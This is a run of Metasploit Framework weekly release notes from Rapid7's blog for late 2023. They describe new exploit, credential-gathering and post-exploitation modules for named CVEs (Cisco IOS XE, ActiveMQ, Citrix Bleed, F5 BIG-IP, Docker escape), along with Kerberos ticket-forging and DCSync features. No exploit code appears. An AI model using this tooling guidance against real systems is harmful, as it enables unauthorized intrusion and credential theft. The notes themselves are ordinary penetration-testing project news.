Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Metasploit Wrap-Up 12/8/2023

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there’s no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/12/01/metasploit-weekly-wrap-up-37/

Customizable DNS resolution

Metasploit Weekly Wrap-Up

Contributor smashery added a new dns command to Metasploit console, which allows the user to customize the behavior of DNS resolution. Similarly to the route command, it is now possible to specify where DNS requests should be sent to avoid any information leak. Before these changes, the Framework was using the default local system configuration. Now, it is possible to specify which DNS server should be queried based on rules that match specific hostnames or domains. It is also possible to route DNS requests through an existing session, which is useful when querying a DNS server located in an internal network we can only reach through a pivot host.

The DNS feature must be enabled to make this command available with features set dns_feature true. Then, use dns help to list the default commands:

msf6 > features set dns_feature true
dns_feature => true
msf6 > dns help
Manage Metasploit's DNS resolution behaviour

Usage:
  dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ...
  dns [remove/del] -i <entry id> [-i <entry id> ...]
  dns [purge]
  dns [print]

Subcommands:
  add - add a DNS resolution entry to resolve certain domain names through a particular DNS server
  remove - delete a DNS resolution entry; 'del' is an alias
  purge - remove all DNS resolution entries
  print - show all active DNS resolution entries

Examples:
  Display all current DNS nameserver entries
    dns
    dns print

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10
    route add --rule *.metasploit.com 192.168.1.10

  Add multiple entries at once
    route add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2
    route add --session 2 --rule *.metasploit.com 192.168.1.10

  Delete the DNS resolution rule with ID 3
    route remove -i 3

  Delete multiple entries in one command
    route remove -i 3 -i 4 -i 5

  Set the DNS server(s) to be used for all requests that match no rules
    route add 8.8.8.8 8.8.4.4

Once set up, any name resolution will be performed according to these rules. For example, setting RHOSTS to a hostname with set RHOST www.example.com and a rule set with route add --session 1 --rule *.example.com 10.10.1.1 will force Framework to resolve the hostname sending a DNS request to the internal DNS server at 10.10.1.1 and through the session 1. No other requests will be sent to avoid information leak.

Tickets in the sky with diamond

Smashery also enhanced the existing Kerberos ticket-forging module and added support for Diamond and Sapphire techniques, which are similar to the Golden and Silver Tickets but stealthier. The Diamond technique consists in using a real TGT and modifies the PAC, assuming the krbtgt Kerberos keys is known. The Sapphire technique makes use of S4U2Self and U2U (User-to-User) to obtain the PAC of another user and assembling it with an existing TGT to impersonate him.

New module content (1)

WordPress Royal Elementor Addons RCE

Authors: Fioravante Souza and Valentin Lobstein
Type: Exploit
Pull request: #18567 contributed by Chocapikk
Path: multi/http/wp_royal_elementor_addons_rce

Description: This pull request adds a new exploit module for CVE-2023-5360, an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.

Enhancements and features (5)

  • #18526 from smashery – This adds a new dns command in Metasploit, to allow the user to customize the behavior of DNS resolution in the framework. DNS resolution can be set to be routed through a session via a specific Comm channel or to request a specific DNS server. Routing rules ensure DNS queries are not sent to unwanted DNS servers and avoid the leak of information.
  • #18560 from smashery – This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
  • #18565 from zeroSteiner – This adds an enhancement to adjust the kerberos cache lookup logic. If no TGT for the specific host is found, it will try again but with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket will not be automatically used for authentication by other services. This will also fix the future issue of the TGT that’s created by the Diamond and Sapphire techniques.
  • #18571 from smashery – Improves the error messages shown to users if there is a validation error with a module’s RHOST datastore values. Now, the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
  • #18580 from adfoster-r7 – Metasploit modules developed using Python can now provide default_options as part of an exploit.

Bugs fixed (1)

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

  • #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

  • #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
  • #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

Metasploit Wrap-up

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal

Metasploit Weekly Wrap-Up

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

  • #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

Documentation added (1)

  • #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat

Metasploit Weekly Wrap-Up

This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that got a great deal of attention: CVE-2023-46604 targeting Apache MQ resulting in ransomware deployment and CVE-2023-20198 targeting Cisco IOS XE OS.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages an insecure deserialization of data to get remote code execution on the target OS in the context of the user running the website which utilized AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

  • #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
  • #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn’t an exact match when credentials for a domain (i.e. windomain.local) should work on a subdomain (i.e. dc.windomain.local).
  • #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.

Bugs fixed (1)

  • #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

Metasploit Weekly Wrap-Up

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – :
    This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).